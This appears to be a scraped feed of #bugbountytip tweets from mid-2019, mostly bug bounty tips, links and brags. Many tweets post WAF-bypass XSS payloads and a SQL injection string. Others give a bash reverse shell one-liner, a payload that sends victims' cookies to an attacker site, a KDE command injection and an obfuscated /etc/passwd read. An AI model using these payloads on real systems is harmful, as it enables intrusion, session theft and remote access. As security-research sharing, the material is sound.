3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec 🚀
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 I you have found an XSS on https://t.co/hykP1iWSJZ ,Find pages running this code on https://t.co/bveLMweNqR : document.domain="https://t.co/dLs7d73fmn " It results in: XSS on A > XSS on B as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! 👀Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } 👁️ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered in the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip perseverance is the key of success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters specially for newbie @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF 🦖
@binb4sh


2019-08-08 10:47:40
0 I you have found an XSS on https://t.co/N5KFrxiY6l ,Find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 Thi should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 🛡️ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic 🎨 @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Some Time Check Cookies when Testing PHP based Web Pentest . Maybe You will get Password & user id on Cookies ;) #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. 🐧 /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudfare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudfare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free udemy courses for a limited time about python,hacking,ceh,networking,cybersecurity. 18 awesome course for a limited time. may the offer will end after 6 hours. so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, i wrote a small post about it. Simple and to the point. Great success with it and thought i'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder at your browser(https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API key at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Lets find out - how!👉 #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19 chapter of the Real-world Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. again the book is highly recommended. you can find the book at amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; 🐞 with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon — my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running you’ve got to warm up. Before public speaking you’ve got to warm up. But I’ve rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. 🤯#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 have a questions about hacking ask the questions in the comment section . i will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time i learn something new from your streaming 🙏 #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing use —no-sign-request. ‘aws s3 command S3://bucket/file —no-sign-request’ #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: 🐞 <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 10:19:52
3 Exactly this 🕵️‍♂️ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use thise tool to dynamically generate your own security (XSS,SQLI,email-format,etc,) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot 👾 (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the jobe done,you should always use 3 or 4 tools to make sure that you get the required/true results. thise apply to all hacking stages. like osint & scanning,,,etc. #bugbountytip #osint #Hacking
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 😱Hurry Join Book Your Seats Now 💢For Web App Pentesting Training 🌀Tomorrow Is Last Day Sign up to below link🔗 https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: 👾 <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. Thts why #XRSI is in conversations wth industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01 ? but, give an impact and a very clear explanation, to open your report and become Triaged #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9

@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result 😁: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which has vulnerability bounty programs or test every possible website as we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early , some took a lot of time …. but eventually they all made it … Its just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking the wrong place with wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: 👾 <script /***/>~/***/confirm(´\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450´~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a Brute-force List . 3-Now use that list to recursively bruteforce all the API endpoint. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. 👾 <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip — Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong 😂 always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. consider them one book. real world bughunting:will learn you how to find bugs based on real world reports Bug Bounty Hunting Essentials;will learn you how to find bugs based on practical effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here Is the Write-up how I bypass the CORS to steal the victim account information 🧐🧐 https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd

@pouyana1


2019-08-01 03:21:17
0 found a bug in microsoft outlook web app : everyone sends me an email, the mail won't deliver and he/she will automatically sign out after that 😂😂 will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF 👾 <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi 🕊️ ‏
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. 💉 but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position . #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: http: https://t.co/rlE7n7PnRi
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. 🕸️ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS 🧐 <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do with him bounty #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. 👀 https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot 😎 "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(“XSS”)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forget to check even presence of token parameter is mandatory or not. 😅 I removed the token parameter and CSRF works as charm. 🙊Then look for other request and it also acts same 🙊 #bugbounty #bugbountytip #infosec
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as a pdf files has been uploaded to my github. repository,the number of articles will continue to get higher until it reach 2000 articles as a pdf files the path to new articles https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
